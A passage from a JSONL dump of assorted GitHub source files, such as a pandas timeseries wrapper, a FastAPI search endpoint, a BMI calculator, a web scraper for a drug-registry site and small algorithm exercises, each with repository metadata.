AggregatedIndicatorSet] = None) -> TimeseriesDataset:\n        \"\"\"Return a new TimeseriesDataset extracted from the original data according to the filter parameters.\n\n        Only the indicator data specified by the filters is returned.\n\n        Parameters\n        ----------\n        start\n            Optional start time from which timeseries data are returned.\n        end\n            Optional end time until which timeseries data are returned.\n        equipment_set\n
            Optional EquipmentSet to filter timeseries data.\n        indicator_set\n                Optional IndicatorSet to filter dataset columns.\n\n        Example\n        -------\n        Filter the indicator data 'My_indicator_data' down to the equipment contained in an EquipmentSet 'my_equipment_set'::\n\n            My_indicator_data.filter(equipment_set=my_equipment_set)\n        \"\"\"\n        start_time = _any_to_timestamp(start, default=self.nominal_data_start)\n        end_time = _any_to_timestamp(end, default=self.nominal_data_end)\n\n        if equipment_set:\n            # we need to filter the user's choice before creating a new TSDataset\n            # since they can specify an arbitrary equipment set which could not be in the TSDataset\n            equipment_ids = [equipment.id for equipment in equipment_set]\n            selected_equi_set = self._equipment_set.filter(id=equipment_ids)\n        else:\n            selected_equi_set = self._equipment_set\n\n        equipment_ids = [equipment.id for equipment in selected_equi_set]\n\n        selected_df = self._df.query('(equipment_id in @equipment_ids) &'\n                                     '(timestamp >= @start_time) & (timestamp < @end_time)')\n\n        if indicator_set is not None:\n            selected_column_ids = [indicator._unique_id for indicator in indicator_set]\n            selected_df = selected_df[self.get_index_columns(include_model=False) + selected_column_ids]\n            selected_indicator_set = indicator_set\n        else:\n            selected_indicator_set = self._indicator_set\n\n        if len(selected_df) == 0:\n            LOG.log_with_warning(\n                'The selected filters removed all data, the resulting TimeseriesDataset is empty.')\n        LOG.debug('Filtered Dataset contains %s rows.', len(selected_df))\n\n        return TimeseriesDataset(selected_df, selected_indicator_set, selected_equi_set,\n                                 start_time, end_time, self.is_normalized)\n\n    def aggregate(self,\n                  aggregation_interval: Union[str, pd.Timedelta],\n                  aggregation_functions: Union[Iterable[Union[str, Callable]], str, Callable] = 'mean')\\\n            -> TimeseriesDataset:\n        \"\"\"\n        Aggregate the TimeseriesDataset to a fixed interval, returning a new TimeseriesDataset.\n\n        This operation will change the unique feature IDs, as the new IDs need to encode the additional information on\n        the aggregation function. Accordingly there will also be an additional column index level for the\n        aggregation function on the DataFrame returned by :meth:`sailor.timeseries.wrappers.TimeseriesDataset.as_df`\n        when using ``speaking_names=True``.\n        Note that the resulting timeseries is not equidistant if gaps larger than the aggregation interval are\n        present in the original timeseries.\n\n        Parameters\n        ----------\n        aggregation_interval\n            String specifying the aggregation interval, e.g. '1h' or '30min'. Follows the same rules as the ``freq``\n            parameter in a ``pandas.Grouper`` object.\n        aggregation_functions\n            Aggregation function or iterable of aggregation functions to use.\n            Each aggregation_function can be a string (e.g. 'mean', 'min' etc) or a function (e.g. 
np.max etc).\n \"\"\"\n aggregation_interval = pd.Timedelta(aggregation_interval)\n if isinstance(aggregation_functions, str) or isinstance(aggregation_functions, Callable):\n aggregation_functions = (aggregation_functions, )\n\n new_indicators = []\n aggregation_definition = {}\n for indicator in self._indicator_set:\n for aggregation_function in aggregation_functions:\n new_indicator = ac_indicators.AggregatedIndicator(indicator.raw, str(aggregation_function))\n new_indicators.append(new_indicator)\n aggregation_definition[new_indicator._unique_id] = (indicator._unique_id, aggregation_function)\n new_indicator_set = ac_indicators.AggregatedIndicatorSet(new_indicators)\n\n grouper = [*self.get_key_columns(include_model=False),\n pd.Grouper(key=self.get_time_column(), closed='left', freq=aggregation_interval)]\n df = self._df.groupby(grouper).agg(**aggregation_definition)\n\n return TimeseriesDataset(df.reset_index(), new_indicator_set, self._equipment_set,\n self.nominal_data_start, self.nominal_data_end, self.is_normalized)\n\n def interpolate(self, interval: Union[str, pd.Timedelta], method='pad', **kwargs) -> TimeseriesDataset:\n \"\"\"\n Interpolate the TimeseriesDataset to a fixed interval, returning a new TimeseriesDataset.\n\n Additional arguments for the interpolation function can be passed and are forwarded to the pandas `interpolate`\n function. The resulting TimeseriesDataset will always be equidistant with timestamps between\n `self.nominal_data_start` and `self.nominal_data_end`. However, values at these timestamps may be NA depending\n on the interpolation parameters.\n By default values will be forward-filled, with no limit to the number of interpolated points between two\n given values, and no extrapolation before the first known point. 
The following keyword arguments can be used to\n achieve some common behaviour:\n - method='slinear' will use linear interpolation between any two known points\n - method='index' will use a pandas interpolation method instead of the scipy-based method, which\n automatically forward-fills the last known value to the end of the time-series\n - fill_value='extrapolate' will extrapolate beyond the last known value (but not backwards before the first\n known value, only applicable to scipy-based interpolation methods.)\n - limit=`N` will limit the number of interpolated points between known points to N.\n Further details on this behaviour can be found in\n https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.interpolate.html\n \"\"\"\n def _fill_group(grp):\n target_times = pd.date_range(self.nominal_data_start, self.nominal_data_end, freq=interval,\n inclusive='left').round(interval)\n\n new_index = pd.DatetimeIndex(target_times.union(grp.timestamp))\n with_all_timestamps = grp.set_index(self.get_time_column()).reindex(new_index).sort_index()\n\n if len(grp) <= kwargs.get('order', 1):\n group_identifier = [grp[key].iloc[0] for key in self.get_key_columns()]\n LOG.warning(f'Not enough datapoints for interpolation in group {group_identifier}!')\n return with_all_timestamps.loc[target_times]\n tmp = with_all_timestamps.interpolate(method=method, **kwargs).loc[target_times]\n tmp.index = tmp.index.set_names('timestamp') # loc loses index name...\n return tmp\n\n interval = pd.Timedelta(interval)\n if interval > (self.nominal_data_end - self.nominal_data_start):\n raise RuntimeError('Can not interpolate to an interval larger than the data range.')\n\n df = (\n self._df\n .groupby(self.get_key_columns(include_model=False))\n .apply(_fill_group)\n .drop(columns=self.get_key_columns(include_model=False))\n .reset_index()\n )\n return TimeseriesDataset(df, self._indicator_set, self._equipment_set,\n self.nominal_data_start, self.nominal_data_end, self.is_normalized)\n","repo_name":"SAP/project-sailor","sub_path":"sailor/sap_iot/wrappers.py","file_name":"wrappers.py","file_ext":"py","file_size_in_byte":24053,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"14299107859","text":"import sys, pickle\r\n\r\ndef findPWMName(pwm):\r\n f = open(\"../../Doc/Vertebrate PWM/full_matrix_list.txt\", \"r\")\r\n s = f.readline()\r\n while s != \"\":\r\n stringList = s.split(\";\")[0].split()\r\n if pwm == stringList[0]:\r\n f.close()\r\n return stringList[2]\r\n s = f.readline() \r\n f.close()\r\n return \"noName\"\r\n\r\ndef findPWMFam(pwm): \r\n f = open(\"../../Doc/Vertebrate PWM/full_matrix_list.txt\", \"r\")\r\n s = f.readline()\r\n while s != \"\":\r\n stringList = s.split(\";\")[0].split() \r\n if pwm == stringList[0]:\r\n f.close()\r\n classString = \"\"\r\n if len(stringList) > 4:\r\n classString = stringList[3].replace(\",\",\"\") + \"_\" + stringList[4]\r\n else: classString = stringList[3] \r\n return classString\r\n s = f.readline() \r\n f.close()\r\n return \"noFam\"\r\n\r\ndef average(lineSplits):\r\n acc = float(0)\r\n for i in range(len(lineSplits)):\r\n acc += float(lineSplits[i][2])\r\n \r\n return str(acc/float(len(lineSplits)))\r\n\r\ndef accLLs(lineSplits):\r\n ret = \"\"\r\n for i in range(len(lineSplits)):\r\n ret = ret + lineSplits[i][2] + \",\"\r\n return ret\r\n\r\ndef main(args):\r\n gaps = [1, 2, 3, 4, 5, 6, 7]\r\n pwmFile = open(\"../../Doc/Vertebrate PWM/PWMlist.txt\", \"r\")\r\n pwms = pickle.load(pwmFile)\r\n 
pwmFile.close()\r\n\r\n for gap in gaps: \r\n excelFile = open(\"../../Results/Transitive/\" + str(gap+1) + \" Edges.csv\", \"w\")\r\n for i in range(len(pwms)):\r\n flag = False\r\n try:\r\n singleFile = open(\"../../Results/Real/Raw Data/Gap 0/\" + pwms[i] + \"(p \" + str(-9) + \").gff.ll\", \"r\")\r\n edgeFile = open(\"../../Results/Real/Raw Data/Gap \" + str(gap) + \"/\" + pwms[i] + \"(p \"+ str(-9)+ \").gff.ll\", \"r\")\r\n flag = True\r\n except: pass #print \"not here\", \"../../Results/Real/Raw Data/Gap \" + str(gap) + \"/\" + pwms[i]+ \"(p \"+ str(9)+ \").gff.ll\"\r\n if flag == True:\r\n LLFiles = []\r\n for q in range(gap+1):\r\n LLFiles.append(singleFile.readline()) \r\n edge = edgeFile.readline()\r\n while LLFiles[gap].split()[0] != \"Hit\": \r\n lineSplits = []\r\n for q in range(gap+1):\r\n lineSplits.append(LLFiles[q].split())\r\n \r\n excelFile.write(findPWMFam(pwms[i]) + \",\" + findPWMName(pwms[i]) + \",\" + pwms[i] + \",\" +\\\r\n lineSplits[0][0].replace(\"(\",\"\").replace(\",\",\"\") + \",\" + lineSplits[gap][1].replace(\")\",\"\") + \",\" + edge.split()[2] + \\\r\n \",\" + accLLs(lineSplits) + average(lineSplits) + \"\\n\") \r\n for q in range(gap):\r\n LLFiles[q] = LLFiles[q+1]\r\n LLFiles[gap] = singleFile.readline()\r\n edge = edgeFile.readline()\r\n singleFile.close()\r\n edgeFile.close()\r\n excelFile.close()\r\n sys.exit(0)\r\n# -----------------------------------------------------------------------------\r\n# The following code executes upon command-line invocation\r\nif __name__ == \"__main__\": main(sys.argv)\r\n# -----------------------------------------------------------------------------\r\n# EOF\r\n","repo_name":"samesense/compmut","sub_path":"Method1/Code/Analysis/makeTransExcel.py","file_name":"makeTransExcel.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"27254153329","text":"\"\"\"\nA management command to import the sample DPU data from a CSV file.\n\"\"\"\nfrom csv import DictReader\n\nfrom dateutil.parser import isoparse\nfrom django.core.management import BaseCommand\nfrom django.db import transaction\nfrom django.utils.decorators import method_decorator\n\nfrom dpu.models import DPU, Doorway, Space\nfrom dpu.utils import record_dpu_event\n\n\n@method_decorator(transaction.atomic, name=\"handle\")\nclass Command(BaseCommand):\n \"\"\"Implementation of the sample data import process.\"\"\"\n\n help = \"Imports the sample DPU data.\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"file\", help=\"file with the sample DPU data in CSV format\")\n\n def handle(self, *args, **options):\n \"\"\"Handler for the command.\"\"\"\n # Perform initial database setup, if base objects are not already added.\n space_a, _ = Space.objects.get_or_create(name=\"A\")\n space_b, _ = Space.objects.get_or_create(name=\"B\")\n doorway_x, _ = Doorway.objects.get_or_create(name=\"X\")\n doorway_z, _ = Doorway.objects.get_or_create(name=\"Z\")\n DPU.objects.get_or_create(dpu_id=283, doorway=doorway_x, entry_space=space_a)\n DPU.objects.get_or_create(\n dpu_id=423, doorway=doorway_z, entry_space=space_a, exit_space=space_b\n )\n with open(options[\"file\"], \"r\") as source:\n self.process_file(source)\n\n def process_file(self, source):\n \"\"\"Actually read the data from the file and import it.\"\"\"\n reader = DictReader(source)\n for row in reader:\n record_dpu_event(\n dpu_id=int(row[\"dpu_id\"]),\n timestamp=isoparse(row[\"timestamp\"]),\n 
direction=int(row[\"direction\"]),\n )\n","repo_name":"rmecham/density","sub_path":"source/dpu/management/commands/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37775149513","text":"#Filtering a text: This program computes the vocabulary of a text, then removes all items\r\n#that occur in an existing wordlist, leaving just the uncommon or misspelled words\r\nimport nltk\r\ndef unusual_words(text):\r\n text_vocab = set(w.lower() for w in text if w.isalpha())\r\n english_vocab = set(w.lower() for w in nltk.corpus.words.words())\r\n unusual = text_vocab.difference(english_vocab)\r\n print(sorted(unusual))\r\n\r\nunusual_words(nltk.corpus.gutenberg.words('austen-sense.txt'))\r\n","repo_name":"KushalVijay/Natural-Language-Processing-Zero-to-Hero","sub_path":"Filtering text.py","file_name":"Filtering text.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"37684318891","text":"# Parent class\n\nclass Student:\n def __init__(self, name, ID, age, mood, grade):\n self.name = name\n self.ID = ID\n self.age = age\n self.mood = mood\n self.grade = grade\n\n def say_hi(self):\n print(\"Name:\", self.name,\n \"\\nID:\", self.ID,\n \"\\nAge:\", self.age,\n \"\\nMood:\", self.mood,\n \"\\nGrade:\", self.grade)\n\n\n\n\n\n\n\n\n\n","repo_name":"naistangz/OOP","sub_path":"student_data/student_data.py","file_name":"student_data.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"11289511740","text":"import pika\r\nfrom Crypto.Hash import MD5\r\nBROKER = '192.168.1.4'\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host=BROKER))\r\nchannel = connection.channel()\r\nchannel.exchange_declare(exchange='serverHand',exchange_type='fanout')\r\nchannel.exchange_declare(exchange='clientHand',exchange_type='fanout')\r\nresult = channel.queue_declare(exclusive=True)\r\nqueue_name = result.method.queue\r\nchannel.queue_bind(exchange='serverHand',queue=queue_name)\r\n\r\n\r\ndef WF_transmit(packet):\r\n\tchannel.basic_publish(exchange='serverHand',\r\n routing_key='',\r\n body=packet)\r\n\r\ndef sendpacket():\r\n\theader = b'\\x01\\x00\\x07\\x2c\\x04\\x12\\xff'\r\n\tsecret = 'HkdW54vs4FrSUS2Y'\r\n\ttemp = header + secret.encode()\r\n\tht = MD5.new()\r\n\tht.update(temp)\r\n\tfinal = ht.hexdigest()\r\n\tpacket = header + bytes.fromhex(final)\r\n\treturn packet\r\n\r\nWF_transmit(sendpacket())","repo_name":"CineCaldejon/ISSA-IoT","sub_path":"Client/testers/mq_overlayService.py","file_name":"mq_overlayService.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38790285577","text":"from math import inf\nimport numpy\n\ndef readInput():\n \n global leftmost\n global rightmost\n global minX\n global maxX \n\n leftmost = -1\n rightmost = -1\n minX = inf\n maxX = -inf\n\n with open(\"2.in\") as f:\n n = int(f.readline().strip())\n\n puncte = []\n for i in range(n):\n x, y = f.readline().strip().split()\n\n x = int(x)\n y = int(y) \n\n if x > maxX:\n rightmost = i\n maxX = x\n if x < minX:\n leftmost = i\n minX = x\n\n puncte.append((x,y))\n return puncte, n\n\ndef viraj(P, Q, R):\n mat = numpy.array([[1, 1, 1],\n [P[0],Q[0],R[0]],\n [P[1],Q[1],R[1]]])\n\n rez 
= numpy.linalg.det(mat)\n\n if rez == 0:\n return 0\n elif rez > 0:\n return 1\n else:\n return 2\n\n\ndef main():\n\n puncte, n = readInput()\n\n print(puncte)\n\n i = leftmost\n\n P = puncte[i]\n Q = puncte[(i+1) % n]\n\n hull = []\n\n hull.append(P)\n\n while True:\n hull.append(Q)\n\n R = puncte[(i + 2) % n]\n\n if i + 2 <= rightmost: \n rez = viraj(P, Q, R)\n\n if rez == 0 or rez == 2:\n hull.pop(-1)\n hull.append(R)\n elif rez == 1:\n hull.append(R)\n\n elif i + 2 > rightmost:\n rez = viraj(P, Q, R)\n\n if rez == 0 or rez == 1:\n hull.pop(-1)\n hull.append(R)\n elif rez == 2:\n hull.append(R)\n\n i = (i + 1 ) % n\n P = Q\n Q = R\n\n if i == leftmost:\n print(hull)\n return\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"mihai-radulescu/UniversitySecondYear","sub_path":"AA/Part2/Lab5/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10423584601","text":"import logging\r\nimport os\r\nimport json\r\nfrom typing import Union, Optional\r\n\r\nimport azure.functions as func\r\n\r\nfrom pydantic import BaseModel\r\nfrom fastapi import FastAPI, File, UploadFile\r\nfrom sqlalchemy.orm import Session\r\nfrom sqlalchemy import text\r\nimport sqlalchemy as sa\r\n\r\nfrom doc_utils.orm import Document, Embedding\r\nfrom doc_utils.db import get_engine\r\nfrom doc_utils.llm import get_embedding, Chat, DocumentChat\r\n\r\n\r\napp = FastAPI()\r\n\r\nblob_connection_str = os.getenv(\"BLOB_CONNECTION_STR\")\r\n\r\n\r\nclass DBDocument(BaseModel):\r\n id: int\r\n blob_path: str\r\n full_text: Optional[str]\r\n file_hash: str\r\n title: str\r\n authors: list[str]\r\n keywords: list[str]\r\n page_summaries: Optional[str]\r\n summary: str\r\n\r\n\r\ndef document_mapper(doc: Document):\r\n doc = doc.__dict__.copy()\r\n del doc[\"_sa_instance_state\"]\r\n del doc[\"page_summaries\"]\r\n del doc[\"full_text\"]\r\n return doc\r\n\r\n\r\n@app.get(\"/search\")\r\nasync def embedding_search(\r\n content: str, skip: int = 0, limit: int = 10\r\n) -> list[DBDocument]:\r\n print(\"searching\")\r\n embedding = json.dumps(get_embedding(content))\r\n engine = get_engine()\r\n with Session(engine) as session:\r\n cte = (\r\n sa.select(\r\n Embedding.doc_id,\r\n text(f\"MIN(embedding <=> '{embedding}') AS vector_distance\"),\r\n )\r\n .group_by(Embedding.doc_id)\r\n .order_by(text(\"vector_distance\"))\r\n .offset(skip)\r\n .limit(limit)\r\n .cte(name=\"distances\")\r\n )\r\n results = (\r\n session.query(Document)\r\n .join(cte, cte.c.doc_id == Document.id)\r\n .order_by(text(\"distances.vector_distance\"))\r\n .all()\r\n )\r\n docs = [document_mapper(doc) for doc in results]\r\n return docs\r\n\r\n\r\n@app.post(\"/qna\")\r\nasync def submit_chat(chat: Chat) -> Chat:\r\n engine = get_engine()\r\n with Session(engine) as session:\r\n doc = session.query(Document).filter(Document.id == chat.doc_id).first()\r\n chat.document = doc.summary\r\n\r\n chat_gen = DocumentChat(chat)\r\n next_chat = chat_gen.predict()\r\n\r\n return next_chat\r\n\r\n\r\n@app.post(\"/newdocument\")\r\nasync def upload_document(file: UploadFile = File()):\r\n return {\"file_size\": file.filename}\r\n\r\n\r\n@app.post(\"/qna\")\r\nasync def document_chat():\r\n return\r\n\r\n\r\nasync def main(req: func.HttpRequest, context: func.Context) -> func.HttpResponse:\r\n \"\"\"Each request is redirected to the ASGI handler.\"\"\"\r\n return await func.AsgiMiddleware(app).handle_async(req, 
context)\r\n","repo_name":"bwilliams2/AzureOpenAIDocSearch","sub_path":"api/backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71209313126","text":"import qt\n\n\nclass DragAndDropEventFilter(qt.QWidget):\n def __init__(self, target, callback, parent=None):\n super(DragAndDropEventFilter, self).__init__(parent)\n self.target = target\n self.callback = callback\n\n def eventFilter(self, obj: qt.QObject, event: qt.QEvent):\n if not self.callback or obj != self.target or event.type() != qt.QEvent.Drop:\n return False\n\n event.accept()\n for url in event.mimeData().urls():\n if self.callback:\n self.callback(url.path()[1:])\n return True\n","repo_name":"KitwareMedical/SlicerLiteExtension","sub_path":"SlicerLite/SlicerLiteLib/EventFilters.py","file_name":"EventFilters.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73102769764","text":"import asyncio\nimport traceback\nfrom quart import jsonify, Quart, request\nfrom wiki_search import search_results\nfrom wikipedia.exceptions import PageError\n\napp = Quart(__name__)\n\n@app.route(\"/\", methods=[\"GET\"])\nasync def wiki_search():\n host = request.host\n if host:\n subdomain = host.split(\".\")[0] \n error_msg = \"\"\n status = 200\n try:\n results = search_results(subdomain)\n except PageError:\n error_msg = subdomain + \" did not return any wikipedia search results.\"\n status = 404\n except:\n error_msg = traceback.format_exc()\n status = 500\n if not error_msg:\n return jsonify({\"links\": results}), status\n else:\n return jsonify({\"error\": error_msg}), status\n\napp.run(host=\"localhost\")\n","repo_name":"jamespeacock/wiki-search","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25545120827","text":"# Software Testing and Quality Assurance - Assignment 3\n# Name: Karan Singh\n# NetID: kds662\n# Purpose: new changes\n\ndef BMI_calc(weight_lb, feet, inches):\n\n weight_kg = convert_lb_to_kg(weight_lb)\n height_m = convert_feet_inch_to_m(feet, inches)\n BMI = (weight_kg / (height_m * height_m))\n\n return round(BMI, 1)\n\ndef BMI_calc_category(BMI):\n # [0, 18.5)\n if (BMI >= 0) and (BMI < 18.5):\n BMI_category = \"Underweight\"\n # [18.5, 24.9]\n elif (BMI >= 18.5) and (BMI <= 24.9):\n BMI_category = \"Normal\"\n # [25, 29.9]\n elif (BMI >= 25) and (BMI <= 29.9):\n BMI_category = \"Overweight\"\n # [30, infinity)\n elif BMI >= 30:\n BMI_category = \"Obese\"\n else:\n BMI_category = \"Error\"\n\n return BMI_category\n\ndef convert_lb_to_kg(weight_lb):\n weight_kg = weight_lb * 0.45\n return weight_kg\n\ndef convert_feet_inch_to_m(feet, inches):\n total_inches = (feet * 12) + inches\n height_m = total_inches * 0.025\n return height_m\n\ndef web_BMI_calc(weight_lb, height_ft, height_in):\n weight = int(weight_lb)\n feet = int(height_ft)\n inches = int(height_in)\n BMI = BMI_calc(weight, feet, inches)\n BMI_category = BMI_calc_category(BMI)\n return BMI, BMI_category\n\ndef main():\n print(\"Welcome to our BMI Calculator\\n\")\n while(1):\n weight_lb = int(input(\"Please enter your weight (in pounds): \"))\n print(\"Please enter your height -\")\n feet = int(input(\"(in feet): \"))\n inches = int(input(\"(inches): \"))\n BMI = BMI_calc(weight_lb, 
feet, inches)\n BMI_category = BMI_calc_category(BMI)\n print(\"Your BMI is: \" + str(round(BMI, 2)))\n print(\"Your BMI category is: \" + BMI_category)\n continue_loop = input(\"\\nWould you like to continue (Y): \")\n if continue_loop != \"Y\":\n print(\"Thank you.\")\n break\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KaranSinghmods/SoftwareTestingQA_Assignment3","sub_path":"BMI_calc.py","file_name":"BMI_calc.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73888558564","text":"# Define an object class that has different attributes - predicted pierceability, actual pierceability, material class, predicted grasp-ability, actual grasp-ability.\n# Further specifies the object position and name\n\nclass MG_object:\n def __init__(self, obj_name, obj_position):\n # Initialize object with name and position\n self.obj_name = obj_name\n self.obj_position = obj_position\n\n # Object attributes\n self.pierce_predict = None\n self.pierce_actual = None\n self.material_class = None\n self.grasp_predict = None\n self.grasp_actual = None\n\n # Permissible values \n self.pierce_values = [None, 1, 0]\n #self.material_values = ['plastic', 'fabric', 'paper', 'wood', 'metal', 'foam']\n self.material_values = ['plastic', 'wood', 'metal', 'foam', 'paper']\n\n def set_attribute(self, attribute, value):\n if attribute == 'pierce_predict':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to pierce_predict attribute')\n else:\n self.pierce_predict = value \n elif attribute == 'pierce_actual':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to pierce_actual attribute')\n else:\n self.pierce_actual = value\n elif attribute == 'grasp_predict':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to grasp_predict attribute')\n else:\n self.grasp_predict = value\n elif attribute == 'grasp_actual':\n if value not in self.pierce_values:\n raise AttributeError('Incorrect value specified to grasp_actual attribute')\n else:\n self.grasp_actual = value\n elif attribute == 'material_class':\n if value not in range(len(self.material_values)):\n raise AttributeError('Incorrect value specified to material_class attribute')\n else:\n self.material_class = self.material_values[value]\n else:\n raise AttributeError('Incorrect attribute specified for instance of class MG_object')\n\n def set_pose(self, position):\n self.obj_position = position\n\n class AttributeError(Exception):\n pass\n\n","repo_name":"lnairGT/Robogyver-Tool-Macgyvering","sub_path":"auxiliary/object_class.py","file_name":"object_class.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"29948419489","text":"def to_fixed(v):\n v = str(v)\n (si, sf) = v.split('.')\n d = int(si)\n f = float('0.' 
+ sf)\n    k = len(sf)\n    mask = (10 ** k)\n\n    r = 0\n    c = 0.0\n    for i in range(64):\n        f *= 2\n        if f > 1.0:\n            c += (1 / (2 ** (i + 1)))\n            r |= (1 << (63 - i))\n            f -= 1.0\n\n    r += (d << 64)\n    b = r.to_bytes(16, byteorder='big')\n    return int(r)\n\n\ndef from_fixed(v):\n    if len(v) > 2:\n        if v[:2] == '0x':\n            v = v[2:]\n    if len(v) % 2 != 0:\n        v = '0' + v\n    if len(v) < 16:\n        raise ValueError('need at least 64 bit hex')\n\n    b = bytes.fromhex(v)\n    w = int.from_bytes(b, byteorder='big', signed=True)\n    d = w & 0xffffffffffffffff\n\n    r = 0.0\n    k = 1 << 63\n    for i in range(64):\n        if k & d > 0:\n            r += (1 / (1 << (i + 1)))\n        k >>= 1\n\n    return float(\"{}.{}\".format((w >> 64), \"{:.64f}\".format(r)[2:]))\n","repo_name":"nolash/python-dexif","sub_path":"dexif/dexif.py","file_name":"dexif.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20292602620","text":"from utils import register_sorter\n\n\n@register_sorter\ndef selection_sort(lst):\n    for i in range(len(lst)):\n        min_idx = i\n        for j in range(i + 1, len(lst)):\n            if lst[min_idx] > lst[j]:\n                min_idx = j\n        lst[i], lst[min_idx] = lst[min_idx], lst[i]\n    return lst\n\n\nif __name__ == '__main__':\n    from utils import check_if_sorted\n    srt = selection_sort([7, 8, 5, 2, 2, 3, 1])\n    print(srt)\n    print(check_if_sorted(srt))\n","repo_name":"nazariinyzhnyk/sorting-algs","sub_path":"sorters/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72406872805","text":"import requests\nimport json\n\n\"\"\"\nDynamically loaded data\nThe company information shown on the home page is requested dynamically via ajax\n\"\"\"\n\"\"\"\nhttp://scxk.nmpa.gov.cn:81/xk/itownet/portal/dzpz.jsp?id=()\nInspecting the detail-page URLs shows that the domain is always the same; only the carried parameter (id) differs.\nThe id values can be obtained from the JSON returned by the home page's ajax request.\nConcatenating the domain with an id value yields the complete detail-page URL for a company.\n\"\"\"\n\"\"\"\nThe company details on the detail page are also loaded dynamically\nhttp://scxk.nmpa.gov.cn:81/xk/itownet/portalAction.do?method=getXkzsById\nAll POST requests go to the same URL; only the id parameter differs.\nOnce we can collect the ids of multiple companies in bulk, we can combine each id with this URL into the complete\najax request URL for the detail data of the corresponding company.\n\"\"\"\n\nheaders = {\n    'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"\n}\n# collect the id values of different companies in bulk\nurl = \"http://scxk.nmpa.gov.cn:81/xk/itownet/portalAction.do?method=getXkzsList\"\nid_list = [] # stores the company ids\nall_data_list = [] # stores the detail data of all companies\n# build the request parameters\nfor page in range(1, 6):\n    page = str(page)\n    data = {\n        'on': 'true',\n        'page': page, # page number to crawl\n        'pageSize': '15',\n        'productName': '',\n        'conditionType': '1',\n        'applyname': '',\n        'applysn': ''\n    }\n    # build the list of company ids\n    json_ids = requests.post(url=url, headers=headers, data=data).json() # returns a dict whose 'list' entry is a list of dicts, one per company\n    for dic in json_ids['list']:\n        # iterate over the dicts in the list and append each company id\n        id_list.append(dic['ID'])\n\n# fetch the company detail data\npost_url = 'http://scxk.nmpa.gov.cn:81/xk/itownet/portalAction.do?method=getXkzsById'\nfor id in id_list:\n    # use each id from the id list as the parameter of an ajax request\n    post_data = {\n        'id': id\n    }\n    detail_json = requests.post(url=post_url, headers=headers, data=post_data).json()\n    all_data_list.append(detail_json)\n\n# persist the results\nwith open(\"allData.json\", \"w\", encoding=\"utf-8\") as fp:\n    json.dump(all_data_list, fp=fp, ensure_ascii=False, indent=True) # indent makes json.dump wrap lines automatically\n
print(\"over!!\")\n","repo_name":"xhj2501/Crawler_train","sub_path":"requests模块应用/requests_5(药监总局).py","file_name":"requests_5(药监总局).py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9438689433","text":"#!/usr/bin/env python\n\n\"\"\"\n@package ion.agents.platform.cgsn.cgsn_client_factory\n@file ion/agents/platform/cgsn/cgsn_client_factory.py\n@author Carlos Rueda\n@brief Cgsn Client factory.\n\"\"\"\n\n__author__ = 'Carlos Rueda'\n\n\n\nfrom pyon.public import log\nimport logging\n\nfrom ion.agents.platform.cgsn.cgsn_client import CGSNClient\nimport os\nimport yaml\n\n_URI_ALIASES_FILENAME = 'ion/agents/platform/cgsn/cgsn_uri_aliases.yml'\n\n\nclass CGSNClientFactory(object):\n    \"\"\"\n    Provides a CGSNClient implementation.\n    \"\"\"\n\n    _uri_aliases = None\n\n    @classmethod\n    def _load_uri_aliases(cls):\n        try:\n            cls._uri_aliases = yaml.load(file(_URI_ALIASES_FILENAME))\n            if log.isEnabledFor(logging.TRACE):\n                log.trace(\"Loaded CGSN URI aliases = %s\" % cls._uri_aliases)\n        except Exception as e:\n            log.warn(\"Cannot load %s: %s\" % (_URI_ALIASES_FILENAME, e))\n            cls._uri_aliases = {}\n\n    @classmethod\n    def create_instance(cls, uri=None):\n        \"\"\"\n        Creates a CGSNClient instance.\n\n        @param uri URI to connect to the CGSN Services endpoint.\n        \"\"\"\n\n        if cls._uri_aliases is None:\n            cls._load_uri_aliases()\n\n        uri = uri or 